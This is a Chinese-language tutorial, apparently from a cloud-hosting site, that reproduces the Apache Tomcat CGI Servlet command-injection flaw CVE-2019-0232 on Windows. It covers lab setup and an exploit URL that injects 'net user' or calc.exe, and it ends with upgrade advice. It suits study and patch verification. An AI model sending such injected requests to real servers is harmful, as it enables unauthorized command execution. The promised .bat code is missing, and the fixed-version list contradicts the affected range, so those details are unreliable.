溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
Tomcat 服務器是一個免費的開放源代碼的Web 應用服務器,屬于輕量級應用服務器,在中小型系統和并發訪問用戶不是很多的場合下被普遍使用,是開發和調試JSP 程序的首選。對于一個初學者來說,可以這樣認為,當在一臺機器上配置好Apache 服務器,可利用它響應HTML(標準通用標記語言下的一個應用)頁面的訪問請求。實際上Tomcat是Apache 服務器的擴展,但運行時它是獨立運行的,所以當你運行tomcat 時,它實際上作為一個與Apache 獨立的進程單獨運行的。
該漏洞只對Windows平臺有效,攻擊者向CGI Servlet發送請求,可在具有Apache Tomcat權限的系統上注入和執行任意操作系統命令。漏洞成因是當將參數從JRE傳遞到Windows環境時,由于CGI_Servlet中的輸入驗證錯誤而存在該漏洞。
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93
環境:Java8+Apache Tomcat 8.5.39
1.安裝tomcat需要java8環境,jdk下載地址:
https://www.oracle.com/java/technologies/javase-downloads.html
2.下載完成后雙擊安裝,一直點擊下一步知道安裝完成。
2.在系統環境變量中新建JAVA_HOME添加java安裝路徑,然后在Path變量編輯添加%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;
3.安裝tomcat8.5.39版本,下載地址:
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/bin/
4.下載完成后解壓出來配置tomcat,打開Tomcat安裝目錄的apache-tomcat-8.5.39\conf\web.xml把取消以下兩項的注釋,否則訪問cgi目錄會提示404,在默認情況下配置是注釋的。
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
5.然后修改在conf/context.xml中的<Context>添加privileged="true"語句
6.在apache-tomcat-8.5.39\webapps\ROOT\WEB-INF下創建一個cgi-bin文件夾,并在文件夾內創建一個bat文件寫入以下代碼
7.都配置完成后進入apache-tomcat-8.5.39-src\bin下運行startup.bat啟動tomcat
8.在瀏覽器輸入http://your-ip:8080看到以下頁面表示安裝成功
1.在瀏覽器訪問http://your-ip/cgi-bin/test.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user,執行net user 命令
2.把后面的命令修改成calc.exe彈出計算器
建議將受影響版本的用戶應該應用下列其中一項緩解。升級到:
Apache Tomcat 9.0.18或更高版本
Apache Tomcat 8.5.40或更高版本
Apache Tomcat 7.0.93或更高版本
看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
